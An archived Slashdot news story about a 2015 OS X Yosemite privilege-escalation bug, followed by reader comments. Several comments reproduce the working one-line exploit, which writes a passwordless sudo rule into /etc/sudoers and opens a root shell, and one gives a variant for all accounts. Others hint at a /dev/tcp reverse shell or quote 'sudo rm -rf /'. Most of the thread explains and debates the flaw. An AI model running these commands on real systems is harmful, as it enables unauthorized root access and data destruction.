A Tweet-Sized Exploit Can Get Root On OS X 10.10

← Back to Stories (view on slashdot.org)

A Tweet-Sized Exploit Can Get Root On OS X 10.10

Posted by timothy on Thursday July 23, 2015 @06:30AM from the special-circumstances dept.

vivaoporto writes: The Register reports a root-level privilege-escalation exploit that allows one to gain administrator-level privileges on an OS X Yosemite Mac using code so small that fits in a tweet. The security bug, documented by iOS and OS X guru Stefan Esserwhich, can be exploited by malware and attackers to gain total control of the computer. This flaw is present in the latest version of Yosemite, OS X 10.10.4, and the beta, version 10.10.5 but is already fixed in the preview beta of El Capitan (OS X 10.11) Speaking of exploits: Reader trailrunner 7 notes that "HP’s Zero Day Initiative has released four new zero days in Internet Explorer that can lead to remote code execution."

92 of 130 comments (clear)

Min score:

Reason:

Sort:

See..... by 8127972 · 2015-07-23 06:39 · Score: 4, Funny

Twitter is bad for you. At least if you're a Mac user.

--
This is my opinion. To make sure you don't steal it, it's covered by the DMCA.
1. Re:See..... by pahles · 2015-07-23 06:49 · Score: 1
  
  Did you care to even read the story?
  
  --
  Sig?
2. Re:See..... by Noah+Haders · 2015-07-23 08:55 · Score: 3, Interesting
  
  I could not imagine a metrosexual urban hipster at burning man. lol. my favorite part about the event is that there are actual signs that say "no shirtcocking". it's ok to be clothed, it's ok to be naked, but to wear a shirt and no bottoms is creepy.
3. Re:See..... by Penguinisto · 2015-07-23 09:01 · Score: 1
  
  I believe it was a joke...
  Funny-but-true: A buddy I work with tried that on a developer's MacBook Pro today. He wound up munging /etc/sudoers instead. Now they're currently trying to figure down how to get a live distro running that can mount Mac filesystems so they can fix that. It's kind of hilarious from my POV..
  Overall, if you already have physical access to the box, it's game-over anyway, and given the astronomically tiny percentage of Macs running OSX 10.10, that has sshd running, and happens to be on a publicly accessible network (either public wifi or a public IP addy)? Prolly not a really big concern...
  
  --
  Quo usque tandem abutere, Nimbus, patientia nostra?
4. Re: See..... by Anonymous Coward · 2015-07-23 09:06 · Score: 1
  
  What worries me is that we're now using tweets as a measurement unit... peoole don't even know what an SMS is anymore nor why it was limited in characters to what it was.
5. Re:See..... by omnichad · 2015-07-23 09:20 · Score: 4, Informative
  
  Now they're currently trying to figure down how to get a live distro running that can mount Mac filesystems so they can fix that. It's kind of hilarious from my POV..
  I thought Macs still supported target disk mode. So all you have to do is boot holding T while it's connected via Firewire or Thunderbolt to another Mac/PC and its internal drive shows up as a disk drive.
  I guess if they want to waste a day using the wrong tools, they can go ahead.
6. Re: See..... by omnichad · 2015-07-23 09:21 · Score: 2
  
  The SMS size limit is different depending on the network/carrier. Tweets are a standard size (to hit the LCD of SMS carriers).
7. Re:See..... by DaphneDiane · 2015-07-23 09:42 · Score: 3, Informative
  
  You can also just boot from an OS X image, for example download the OS X installer extract the installESD.dmg file ( typing from memory but pretty sure that is the name ), install that to a USB drive and boot from it holding the option key when the computer starts up. ( again typing from memory might be command-option or the like ) In fact depending on the age of the computer it might already have a recovery partition that you can just boot directly from and then launch disk utility to mount the main partition and terminal to fix it.
8. Re:See..... by rthille · 2015-07-23 09:51 · Score: 1
  
  I've wondered about that... what about just wearing chaps & a stetson? :-)
  
  --
  Awesome furniture, accessories and cabinetry in Santa Rosa, CA: http://humanity-home.com/
9. Re:See..... by omnichad · 2015-07-23 10:16 · Score: 1
  
  That's a lot more trouble since you still need another working Mac and the other Mac is already unbooted anyway. I think maybe you started typing that thinking about OS X DVD media and realized how much trouble it really is now while you were typing that out.
10. Re:See..... by DaphneDiane · 2015-07-23 10:23 · Score: 1
  
  Yeah booting from media is harder than it used to be, though single user mode and recovery partitions do most of it anyways. ( I actually run a netboot server myself, so just have to boot via network at worse. )
11. Re:See..... by deviated_prevert · 2015-07-23 11:05 · Score: 1
  
  Twitter is bad for you. At least if you're a Mac user.
  True as the average user has the attention span of a twitter user.
  
  --
  This message was not sent from an iPhone because Peter Sellers really was a deviated prevert without a dime for the call
12. Re:See..... by Hylandr · 2015-07-23 16:36 · Score: 1
  
  Butt-hurt hipster garbage detected !!
  
  --
  ~ People that think they are better than anyone else for any reason are the cause of all the strife in the world.
13. Re:See..... by xdor · 2015-07-24 01:31 · Score: 1
  
  Own any Mac by booting to single disk mode, mount read-write, set the root password and done.
14. Re:See..... by painandgreed · 2015-07-24 03:06 · Score: 1
  
  I've wondered about that... what about just wearing chaps & a stetson? :-)
  Aesthetically acceptable and there are probably camps that cater to your particular hobbies.
15. Re:See..... by macs4all · 2015-07-24 03:59 · Score: 1
  
  Now they're currently trying to figure down how to get a live distro running that can mount Mac filesystems so they can fix that. It's kind of hilarious from my POV..
  I thought Macs still supported target disk mode. So all you have to do is boot holding T while it's connected via Firewire or Thunderbolt to another Mac/PC and its internal drive shows up as a disk drive.
  I guess if they want to waste a day using the wrong tools, they can go ahead.
  They do. I thought it went away with FireWire; but it didn't. In fact, I think you can do it over WiFi, too, using AirDrop. That's exactly the way to do it. Just use another Mac.
16. Re:See..... by macs4all · 2015-07-24 04:14 · Score: 1
  
  Why not just use the root account and edit the sudoers file directly? Seems like fussing about with distros is a bit of yak shaving. Switch accounts, login as root. All my Macs have a root account with a passwd set, like something a sysadmin would do.... You do have a root account with a passwd set, don't you?!
  Nearly zero Macs have login for root enabled. It's part of their security measures. You can do it; but almost no one ever does, instead relying on sudo to temporarily grant those privileges to those on the sudoers list.
17. Re:See..... by rthille · 2015-07-24 07:46 · Score: 1
  
  Meh. My "hobbies" at burning man involved doing the naked-bike-ride, drinking a lot, trying to avoid the dust and enjoying the art.
  
  --
  Awesome furniture, accessories and cabinetry in Santa Rosa, CA: http://humanity-home.com/
Esserwhich? by Myria · 2015-07-23 06:42 · Score: 2

It's just Stefan Esser, as far as I've known for the last decade.

--
"Screw Sun, cross-platform will never work. Let's move on and steal the Java language." - Visual J++ Product Manager
Misleading and Hyperbolic Title/Comparison by Galaga88 · 2015-07-23 06:48 · Score: 5, Interesting

Fact[0]: The code for this exploit could fit within a tweet (which is to say: 140 characters.)
Fact[1]: Despite referring to tweets and Twitter, this exploit can't occur via Twitter. The attacker already has to have local access.
A lot of security exploits could fit within a tweet, but I've never seen that comparison before. It misleads people into thinking that you can pwn a Mac via Twitter.
1. Re:Misleading and Hyperbolic Title/Comparison by OzPeter · 2015-07-23 06:55 · Score: 4, Funny
  
  A lot of security exploits could fit within a tweet, but I've never seen that comparison before.
  
  You're right .. they should have specified it in pico Libraries of Congress. At least that's a unit of measurement that most people here would understand.
  
  --
  I am Slashdot. Are you Slashdot as well?
2. Re:Misleading and Hyperbolic Title/Comparison by fyngyrz · 2015-07-23 06:58 · Score: 3, Insightful
  
  Furthermore, local access pretty much is the end of the road anyway. Boot from the right CD with a custom filesystem that ignores HD filesystem permissions and yet allows you to set them any way you want, system is now wide open. Replace a few choice commands that you know are going to run, and bang, fully compromised. And that's just one of the many easy ways in to access as the system stands. You can also copy off the entire HD, or for that matter, erase it. Or both. You can compromise a command for a way in, copy an otherwise encrypted volume and walk off with it, break the encryption at your leisure, then use the previously installed compromise to get in and cause mayhem.
  If you don't have physical security and there is any kind of local threat of compromise, you could become toast at any time. These kinds of "threats" are insignificant in the larger scheme of things. If you need local security, the only sufficient mechanism is to physically deny access to the computer.
  
  --
  I've fallen off your lawn, and I can't get up.
3. Re:Misleading and Hyperbolic Title/Comparison by Anonymous Coward · 2015-07-23 07:08 · Score: 3, Informative
  
  well considering the last exploit was related to special characters in a text message, it's reasonable that the person who didn't read the article would make that mistake.
  But yes, you'd need to be at the box locally for this to be worrisome. I work at a university who's still in the process to migrating people from MAC to PC, so there's tons of apple tech on site, this bug would allow anyone, student, janitor, some dude of the street, to walk up to a machine, login as guest to view the web, then own root.
  It's bad, but not "omg the world is ending bad"
  MAC users should be happy that so much attention is directed at them currently, it's good for us all.
4. Re:Misleading and Hyperbolic Title/Comparison by Anonymous Coward · 2015-07-23 07:13 · Score: 1
  
  Well it is a privilege escalation exploit. All you need to do is get a user to run code in their context either by using social engineering or some other exploit.
  Many exploits don't have much room to work with and a very small privilege escalation routine can help the bad guys keep their payload size down, which is important.
5. Re:Misleading and Hyperbolic Title/Comparison by Galaga88 · 2015-07-23 07:20 · Score: 4, Funny
  
  You're right .. they should have specified it in pico Libraries of Congress. At least that's a unit of measurement that most people here would understand.
  So says you. I'm working on a patch for ext4 right now to display file sizes in kilotweets, megatweets, and teratweets.
6. Re:Misleading and Hyperbolic Title/Comparison by Anonymous Coward · 2015-07-23 07:20 · Score: 1
  
  If it cuts down on Twitter use, I can live with the misleading title.
7. Re:Misleading and Hyperbolic Title/Comparison by PopeRatzo · 2015-07-23 07:41 · Score: 2
  
  But yes, you'd need to be at the box locally for this to be worrisome.
  
  Or, you just need someone gullible to be at the box locally.
  Given that we're talking about Apple products, it might be cause for concern.
  
  --
  You are welcome on my lawn.
8. Re:Misleading and Hyperbolic Title/Comparison by rastos1 · 2015-07-23 08:06 · Score: 1
  
  Can you please also include displaying file timestamps in iWatch boot times?
9. Re:Misleading and Hyperbolic Title/Comparison by fyngyrz · 2015-07-23 08:17 · Score: 1
  
  Seems like it is: "the attacker already has to have local access"
  That's what I was working off of, anyway.
  Network-imposed exploits are something else entirely.
  
  --
  I've fallen off your lawn, and I can't get up.
10. Re:Misleading and Hyperbolic Title/Comparison by Anonymous Coward · 2015-07-23 08:24 · Score: 1
  
  ""the attacker already has to have local access"
  No they don't. They just need to get this line to run:
  echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
  You don't have to have physical access to the computer. The line of code just needs to run and game over.
11. Re:Misleading and Hyperbolic Title/Comparison by mlts · 2015-07-23 08:37 · Score: 2
  
  I do agree that it isn't a remote root shell hole, but it can be combined with something like the SSH brute force vulnerability or another attack that can execute shell commands as an unfettered user... and then the box is compromised.
  The good thing is that Macs have functionality similar to SELinux as well as sandbox capabilities via the App Sandbox. This should be something used by all programs whenever possible, since it allows the OS to isolate the program from the rest of the filesystem and OS, helping mitigate a compromised program.
  Hopefully Apple can issue a fix in a short amount of time, because this is an easy exploit to use, and combined with something like a broken Java variant, could be used via the Web browser to hijack the entire box.
12. Re:Misleading and Hyperbolic Title/Comparison by bidule · 2015-07-23 08:55 · Score: 2
  
  "sudo rm -rf /" also fits in a tweet. It will even ask for the password which their exploit isn't capable of.
  
  --
  ID: the nose did not occur naturally, how would we wear glasses otherwise? (apologies to Voltaire)
13. Re:Misleading and Hyperbolic Title/Comparison by Penguinisto · 2015-07-23 09:13 · Score: 1
  
  You're right .. they should have specified it in pico Libraries of Congress.
  Bullshit - mopeds full of backup tapes is the new standard for that size range now.
  
  --
  Quo usque tandem abutere, Nimbus, patientia nostra?
14. Re:Misleading and Hyperbolic Title/Comparison by Penguinisto · 2015-07-23 09:15 · Score: 4, Informative
  
  Well, that and get them to configure and launch sshd... it's off by default on OSX.
  
  --
  Quo usque tandem abutere, Nimbus, patientia nostra?
15. Re:Misleading and Hyperbolic Title/Comparison by Penguinisto · 2015-07-23 09:17 · Score: 1
  
  Err, in order for an SSH brute force vuln to work against a Mac, sshd has to be on (it's not - you need to go to System Preferences -> Sharing, enable Remote Login, and then include the specific users in "Allow Access For..." )
  
  --
  Quo usque tandem abutere, Nimbus, patientia nostra?
16. Re:Misleading and Hyperbolic Title/Comparison by dsmatthews9379 · 2015-07-23 10:07 · Score: 1
  
  It misleads people into thinking that you can pwn a Mac via Twitter.
  Challenge accepted!
17. Re:Misleading and Hyperbolic Title/Comparison by MSG · 2015-07-23 11:45 · Score: 1
  
  Furthermore, local access pretty much is the end of the road anyway.
  Physical access is usually the end of the road. This exploit doesn't need that, it just needs shell access. Any exploit that allows execution of code in a user's own context can be escalated to root access by this exploit.
18. Re:Misleading and Hyperbolic Title/Comparison by MSG · 2015-07-23 11:50 · Score: 1
  
  Uh... the exploit doesn't need to ask for a password. That's the point. Anyone who can execute any shell command can gain root privileges.
19. Re:Misleading and Hyperbolic Title/Comparison by macs4all · 2015-07-24 04:38 · Score: 1
  
  If you don't have physical security and there is any kind of local threat of compromise, you could become toast at any time. These kinds of "threats" are insignificant in the larger scheme of things. If you need local security, the only sufficient mechanism is to physically deny access to the computer.
  And don't forget that pretty much ANY *NIX OS would fall prey to this type of exploit, right? Once you have physical access, pretty much all bets are off with a sufficiently-talented attacker.
20. Re:Misleading and Hyperbolic Title/Comparison by macs4all · 2015-07-24 04:42 · Score: 1
  
  Hopefully Apple can issue a fix in a short amount of time, because this is an easy exploit to use, and combined with something like a broken Java variant, could be used via the Web browser to hijack the entire box.
  According to TFS, the exploit is already patched in betas of El Capitan, and according to TFA, there is already a patch available (albeit not from Apple itself) for Yosemite, where the vulnerability first appeared.
21. Re:Misleading and Hyperbolic Title/Comparison by macs4all · 2015-07-24 04:46 · Score: 1
  
  Except if you have SuperUser access, there are no sandboxes... Or did you not understand the definition of SuperUser?
  Oh wait, you're defending them... of course you are.
  Wrong. There are still Application sandboxes, regardless of the user's credentials. Some apps that need to have semi-permanent sudo permissions require you to login with them everytime you launch the app, or sometimes will store an Admin password that you supply one time.
  
  And in the case of "root", pretty much NO Macs have the login for "root" enabled. So that's right out.
22. Re:Misleading and Hyperbolic Title/Comparison by macs4all · 2015-07-24 04:51 · Score: 1
  
  But yes, you'd need to be at the box locally for this to be worrisome. I work at a university who's still in the process to migrating people from MAC to PC
  Pray tell, how many executive-level blowjobs from the MS Reps. did THAT take?
  
  Or did the student body unanimously vote to ditch OS X for the wonderful user experience that is The-Interface-Formerly-Known-As-Metro?
23. Re:Misleading and Hyperbolic Title/Comparison by MSG · 2015-07-24 04:58 · Score: 1
  
  sshd doesn't need to be running to get a user to run code in their context by social engineering or some other exploit.
24. Re:Misleading and Hyperbolic Title/Comparison by MSG · 2015-07-24 05:00 · Score: 1
  
  you'd need to be at the box locally for this to be worrisome
  No, you wouldn't. On an unpatched box, this elevates any remote code execution bug into a remote root exploit.
25. Re:Misleading and Hyperbolic Title/Comparison by macs4all · 2015-07-24 06:40 · Score: 1
  
  Cowardly AC here...
  I personally find Apple actually on the ball when it comes to getting stuff fixed. MS was fast patching the font bug, but Apple hasn't been a slouch getting updates out either.
  Now, if Apple could actually start trying to get their foot in the door in the enterprise, things would be interesting.
  Yes, I hope that the ghost of the dear-departed Mr. Jobs doesn't prevent Mssr. Cook from seeing that.
  
  Maybe even bring back a version of XServe, and (finally!) give OS X Server some much-needed love! I mean, FFS, it's a damned Certified UNIX OS! Just because it uses a different GUI and is closer to BSD than it is to Linux (no wars, please!!! I said "CLOSER"), and that parts are closed-source should be of no moment.
26. Re:Misleading and Hyperbolic Title/Comparison by fyngyrz · 2015-07-24 07:51 · Score: 1
  
  Exactly so.
  
  --
  I've fallen off your lawn, and I can't get up.
27. Re: Misleading and Hyperbolic Title/Comparison by MSG · 2015-07-24 07:53 · Score: 1
  
  Yeah, sooome days.
  In my defense, have you seen some of the explanations that people offered for how the exploit actually works? I didn't think it was that hard to understand, but man, dang.
28. Re:Misleading and Hyperbolic Title/Comparison by fyngyrz · 2015-07-24 07:59 · Score: 1
  
  How do you get shell access on your average Mac without physical access? SSH isn't enabled by default as has been pointed out. In fact, it's been a real PITA to get the versions of OS X I've configured to play nice on the network for the command line. I doubt one user in a thousand has done it -- slashdot mac users not being significantly representative of the average mac users, of course. My macs have SSH available, but the port isn't open to the Intertubes outside of my LAN, so it doesn't concern me very much.
  So this essentially resolves to a "you have to be there" exploit.
  
  --
  I've fallen off your lawn, and I can't get up.
29. Re:Misleading and Hyperbolic Title/Comparison by MSG · 2015-07-24 10:19 · Score: 1
  
  I hate to repeat myself, but: Any exploit that allows execution of code in a user's own context can be escalated to root access by this exploit.
  So.. Your PDF reader has an exploit that allows code execution. Without the dyld bug, the PDF bug only allows code to execute in the user's context. With the dyld bug, the PDF bug can give itself passwordless sudo access, and execute shell commands as root.
30. Re:Misleading and Hyperbolic Title/Comparison by tsa · 2015-07-25 04:14 · Score: 1
  
  Ah now I understand how it works. But we can count on Apple to have it fixed by the time El Capitan is out, which is in four months or so?
  
  --
  -- Cheers!
31. Re: Misleading and Hyperbolic Title/Comparison by tsa · 2015-07-25 04:17 · Score: 1
  
  Not everybody here is as computer savvy as you.
  
  --
  -- Cheers!
Explains It by xdor · 2015-07-23 06:48 · Score: 1

Lost control of my keyboard twice this week.
Discovered the Mac's firewall was down. But couldn't find any history on the keyboard getting redirected to remote address.
I was ready to chalk it up to a bad driver update by Apple, but I should probably assume I've been rooted.
1. Re:Explains It by Galaga88 · 2015-07-23 07:26 · Score: 3, Insightful
  
  Is it a wireless keyboard? Could the um, batteries be going out? Or maybe Bluetooth interference?
  I'm just not sure I'd jump straight from malfunctioning keyboard to rooted, even if my firewall wasn't up. Is your router even forwarding any ports to your Mac?
2. Re:Explains It by xdor · 2015-07-23 07:54 · Score: 1
  
  MacBook Pro -- integrated keyboard.
  Happened twice: once after sitting idle for a few minutes with a web page open (did not enter sleep mode), the other on boot at the login screen.
  The fact it happened on boot is what made me dismiss it as a possible update issue.
  No ports being forwarded, but after seeing this anything that exposes a unix account and allows any environmental variable to be set (even one for the app's own private shell) would be able to core this apple. Redirecting a shell to a remote IP is trivial
  exec /bin/sh 0 (path to dev-tcp-IP-PORT etc)
  Just don't know if that would take keyboard away from an active user...
Known vulnerability? by TwentyCharsIsNotEnou · 2015-07-23 06:49 · Score: 4, Interesting

Already fixed in the (preview) next OSX version - is that by luck or design?

Makes me wonder how many known vulnerabilities Microsoft / Apple / Google have on their buglist that will only be fixed when they become publicly known.
1. Re:Known vulnerability? by MSG · 2015-07-23 11:47 · Score: 1
  
  is that by luck or design?
  
  We don't know. It's plausible that the code was cleaned up without considering the security aspects of the change.
Twit by Anonymous Coward · 2015-07-23 06:50 · Score: 2, Insightful

As small as a tweet and still too big to fit in the summary.
Oh ffs. by Harold+Halloway · 2015-07-23 06:53 · Score: 5, Funny

Well done. You realise that this story will be reported in tomorrow's Daily Mail as 'Twitter Steals Apple Users' Bank Details'?
1. Re:Oh ffs. by Anonymous Coward · 2015-07-23 07:30 · Score: 1
  
  Calm yourself. No one pays attention to Slashdot anymore. This isn't like a decade ago when /. was in the top 10 tech sites. Today it would fit somewhere between 1337warez123.ru and Bob's FTP Commands Cheatsheet on GeoCities.
2. Re:Oh ffs. by barbariccow · 2015-07-23 09:03 · Score: 1
  
  Calm yourself. No one pays attention to Slashdot anymore. This isn't like a decade ago when /. was in the top 10 tech sites. Today it would fit somewhere between 1337warez123.ru and Bob's FTP Commands Cheatsheet on GeoCities.
  Phil's CheatSheat on angel fire was sooo much better.
How the hell does this get into live software? by Anonymous Coward · 2015-07-23 06:55 · Score: 1

This is one of the stupidest security holes I have ever seen. Ever. How does a company with the resources of apple not spot this. Not even spot it, what kind of retard decides to implement something like this. Let's link a publicly modifiable ENV to a setuid system program and allow it to write wherever the fuck it want without authentication. Wut? Apple put on the dunce cap, we know your security is shit but this is way beyond ridiculous.
1. Re:How the hell does this get into live software? by Anonymous Coward · 2015-07-23 07:09 · Score: 1
  
  Ordered by, payed by and delivered to, the NSA.
2. Re: How the hell does this get into live software? by markus · 2015-07-23 07:11 · Score: 4, Interesting
  
  The bug is stupid. No doubt about that. But it's not quite as stupid as you think.
  The bug is not actually in the setuid application, but it is in the system wide dynamic loader that is needed to execute the setuid application.
  So, a naive programmer could be excused to think that they don't need to worry about security as it is not immediately obvious that the code executes with elevated privileges.
  Of course a more seasoned developer should have noticed. It's not that difficult to spot, especially as dynamic loaders are known to have had security bugs before. I think even Linux was affected at one time.
3. Re: How the hell does this get into live software? by MSG · 2015-07-23 12:46 · Score: 1
  
  I think even Linux was affected at one time.
  Yes. The Linux dynamic linker had a list of environment variables that it cleared when executing in a SUID context, for security. A comma was removed from the list, which caused the compiler to concatenate two of the strings. The result was that neither of those two variables were cleared, and so "LD_PRELOAD" could be used to load a replacement shared library into a SUID binary.
4. Re: How the hell does this get into live software? by phantomfive · 2015-08-04 19:24 · Score: 1
  
  It shows that Apple doesn't have proper processes in place to manage security properly. This kind of code should have been reviewed for security, but clearly it wasn't.
  
  --
  "First they came for the slanderers and i said nothing."
You're welcome by slashdice · 2015-07-23 07:00 · Score: 5, Informative

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

--
Copyright (c) 1990 - 2014 Dice. All rights reserved. Use of this comment is subject to certain Terms and Conditions.
1. Re:You're welcome by nneonneo · 2015-07-23 15:42 · Score: 4, Informative
  
  Some folks were asking how this works, so here goes:
  newgrp is a UNIX utility that executes a shell with a new group ID (UNIX specification page: http://pubs.opengroup.org/onli...). This requires root permission since it can change the group ID to one outside the current shell's group list (e.g. to any group in the uid's group list). Therefore, newgrp is a setuid root application which launches a shell.
  DYLD_PRINT_TO_FILE is a dyld (OS X dynamic linker) environment variable that tells dyld where to print debugging information. Ordinarily, dyld supports a large number of debugging options to facilitate debugging shared libraries and to allow neat tricks like DYLD_INSERT_LIBRARIES (equivalent to LD_PRELOAD on Linux). When dyld sees this environment variable, it opens a new file descriptor connected to the specified file. Since fds 0,1,2 are already connected to stdin, stdout and stderr, the file is opened as fd 3.
  Notably, since newgrp starts as root, the file is opened using root's permissions, even though newgrp later drops privileges to spawn the shell.
  Because DYLD_ environment variables can modify a program's behaviour in unexpected ways, they are usually deleted or sanitized prior to running setuid programs (because otherwise an unprivileged attacker could cause a setuid program to misbehave, exactly as in this exploit). Apple clearly forgot to sanitize the new DYLD_PRINT_TO_FILE when shipping Yosemite, opening this particular flaw up.
  Finally, the (outer) echo command tells the subshell spawned by newgrp to execute the (inner) echo command, which outputs the string "$(whoami) ALL=(ALL) NOPASSWD:ALL" into fd 3, which (due to the DYLD_PRINT_TO_FILE variable) is /etc/sudoers. This line tells sudo that *any* account is allowed sudo access, and that no password is required to use sudo.
  The subshell then exits (no more commands to run), and the final command "sudo -s" executes. Since sudo no longer requires a password, and all accounts can use sudo, "sudo -s" just immediately opens a root shell without prompting.
2. Re:You're welcome by nullchar · 2015-07-24 02:59 · Score: 1
  
  $(whoami) ALL=(ALL) NOPASSWD:ALL
  It only grants the current user (result of `whoami`) full sudo access, not every account.
3. Re:You're welcome by MSG · 2015-07-24 05:09 · Score: 1
  
  Apple clearly forgot to sanitize the new DYLD_PRINT_TO_FILE
  They also forgot to set the close-on-exec flag for the file they open. If they had done that, then at least only the SUID application would be a target, instead of the SUID application and any child process.
  
  which outputs the string "$(whoami) ALL=(ALL) NOPASSWD:ALL" into fd 3
  Actually, $(whoami) will be executed and its output substituted by the shell. The username of the user will replace that string, so root access will be granted by sudo only to the user that runs the exploit, not to all users. This would give root access to all users:
  echo 'echo "ALL ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
Re: But can it be a Tweet? by tysonedwards · 2015-07-23 07:00 · Score: 4, Informative

It's a hip way of saying small. He found that invoking DYLD_PRINT_TO_FILE runs as root, and as such can allow a user to write to /etc/sudoers, giving the user sudo privileges, letting them sudo to root. echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

--
Thirty four characters live here.
Negative by xdor · 2015-07-23 07:00 · Score: 4, Interesting

Just tested this on my Mac in OS X -- grants root level access immediately.
1. Re:Negative by 93+Escort+Wagon · 2015-07-23 08:51 · Score: 2
  
  Just tested this on my Mac in OS X -- grants root level access immediately.
  Yup - even if you're a non-privileged user.
  Since most people are running with administrator accounts (which is dumb), I thought that might've been necessary - but it worked from an account that didn't have sudo access.
  
  --
  #DeleteChrome
2. Re:Negative by rthille · 2015-07-23 10:04 · Score: 1
  
  It doesn't work for me, as I have sudo setup to require my Yubikey, but that'd be a small speedbump, since the same exploit could be used to change the /etc/pam.d/sudo config...
  
  --
  Awesome furniture, accessories and cabinetry in Santa Rosa, CA: http://humanity-home.com/
3. Re:Negative by brantondaveperson · 2015-07-23 11:00 · Score: 1
  
  It also modifies your sudoers file, which you might want to modify back again once you're tried it out.
  I mean, you probably know that, but other people who run it may not, and it does rather leave you wide open even if this exploit is one day fixed.
4. Re:Negative by xdor · 2015-07-23 13:44 · Score: 1
  
  Unless Apple addresses this -- all Macs are wide open regardless.
  But testing as "guest" or "nobody" would leave the system open without having to append the sudoers file first -- so agree: clean up after testing.
Are You Sure? by xdor · 2015-07-23 07:05 · Score: 2

Local application access!
I'm still trying to determine if this would be effective JavaScript Shell
You just have to be able to set an environment variable no matter who you are and you're root. It's just a question if FireFox has its own "environment" or relies on an under-privileged UNIX account.
From what I can tell, this is a wide-open window. Huge, huge, flaw.
What? by Anonymous Coward · 2015-07-23 07:11 · Score: 1

My security expert assured me that size doesn't matter!
1. Re:What? by PopeRatzo · 2015-07-23 07:44 · Score: 1
  
  My security expert assured me that size doesn't matter!
  My security expert is Ron Jeremy and he disagrees.
  
  --
  You are welcome on my lawn.
Sarcasm... by moosehooey · 2015-07-23 07:42 · Score: 3, Insightful

No, you're the one that's stupid, because you failed to see that the OP was being sarcastic.
Re: But can it be a Tweet? by dunkindave · 2015-07-23 07:50 · Score: 5, Informative

It's a hip way of saying small. He found that invoking DYLD_PRINT_TO_FILE runs as root, and as such can allow a user to write to /etc/sudoers, giving the user sudo privileges, letting them sudo to root. echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

He found that invoking DYLD_PRINT_TO_FILE runs as root, and as such can allow a user to write to /etc/sudoers, giving the user sudo privileges, letting them sudo to root. echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
Small correction. DYLD_PRINT_TO_FILE doesn't run as root, it just tells the dynamic library where to write error logs. The problem is it is accepted and used by child processes, even setuid ones, so by setting the environment variable, then calling sudo (which runs as root) with an invalid argument that will cause an error to be logged, he can create or append to any file on the machine he wants. He used the sudoers file for his example, but I am sure there are many other possibilities.
BTW, this is a similar exploit to the LD_LIBRARY_PATH exploit from many years ago where you could get a setuid program to use your dynamic library instead of the system one, thereby getting your code to run as root. It was fixed by having the loader check if the program uid doesn't equal euid and if so ignore the LD_LIBRARY_PATH variable. Apparently programmers at Apple are guilty of not learning from history and are therefore repeating it.
I have an exploit that fits in a tweet, too... by Myria · 2015-07-23 08:00 · Score: 1

A lot of security exploits could fit within a tweet, but I've never seen that comparison before. It misleads people into thinking that you can pwn a Mac via Twitter.
My exploit to load unsigned drivers on Windows 8, 8.1 and 10 even with Secure Boot enabled fits in the length of a tweet. I'll release it whenever WinPhone 10 comes out, probably.

--
"Screw Sun, cross-platform will never work. Let's move on and steal the Java language." - Visual J++ Product Manager
Comment removed by account_deleted · 2015-07-23 08:07 · Score: 1

Comment removed based on user account deletion
Re:Didn't upgrade to Yosemite, yay! by cant_get_a_good_nick · 2015-07-23 08:20 · Score: 1

Because there's never security holes in beta software...
Agreed, that statement from TFA is pretty stupid.
Please explain more by goombah99 · 2015-07-23 08:52 · Score: 2

Reading the explanation here: https://www.sektioneins.de/en/...
I don't fully understand how it works, but it seems to be more complex than what you just said. I suspect it depends on a parent process inheriting a child procesess setuid for accessing a file.
the bash script however is a riddle to me. I don't understand how the pipe to channel 3 ends up in the /etc/sudoers file. Where does channel 3 go. I suspect the newgrp statement is there to just be any process which does a setuid as root. Not sure. Again I don't understand how it's being called here.
What does the environment variable look like as this executes? which parts of it execute when? and how does the echo get to the file.
the final sudo -s I understand.
can someone break this down for me?

--
Some drink at the fountain of knowledge. Others just gargle.
1. Re:Please explain more by complete+loony · 2015-07-23 15:40 · Score: 1
  
  newgrp is a setuid binary. During the startup of that process, if the vulnerable environment variable is set, dyld will open the requested file. Since stdin=0 / stdout=1 / stderr=2 should be the only open files, the next available file descriptor would be 3. So open() should give dyld that file descriptor.
  newgrp will then drop it's privileges and run your shell, perhaps by calling exec() without forking another process. Since the file wasn't specified to close on exec, the shell will inherit the open file descriptor.
  If we pass "echo "[something]" >&3" to stdin of newgrp, the echo will be executed in the new shell. Even though that shell is running as the logged in user, fd=3 was opened by root. So the result can be appended to any file you want.
  
  --
  09F91102 no, 455FE104 nope, F190A1E8 uh-uh, 7A5F8A09 that's not it, C87294CE no. Ah! 452F6E403CDF10714E41DFAA257D313F.
Comment removed by account_deleted · 2015-07-23 08:52 · Score: 1

Comment removed based on user account deletion
I still don't understand by goombah99 · 2015-07-23 09:32 · Score: 1

That command is a riddle and, forgive me, but I think your explanation is wrong.
the final sudo -s is not there to create an error. it's a perfectly fine command and is that to just make you root on the spot.
I think a partial explanation of what goes on is this:
the first bin just creates the text you want to shove into the sudoers file. that's clear enough.
the pass to >&3 is saying send this text to file descriptor 3. This doesn't exist..yet...but it will shortly.
So how does the file open happen? Well if you put an environment variable definition in front of a command, what happens is the command runs with that environment variable temporarily set for the duration of the command. thus
DYLD_PRINT_TO_FILE=/etc/sudoers newgrp
says create the env DYLD_PRINT_TO_FILE temporarily and set it to /etc/sudoers and after setting that, then execute newgrp.
newgrp doesn't actually do anything at all here other than launch a new shell which promptly quits. However it does run with setuid root privilege.
guessing here: And while it's running but not doing anything the system goes, oh, I better open a stream to the DYLD_ file because there might be some output to log there. So it opens that file pre-emptively and duly assigns it to file descriptor 3 for input.
unfortunately DYLD has inherited the permission of newgrp to do that, so its doing a file open as root too.
So we can now write to 3 and DYLD_ redirects that into the file.
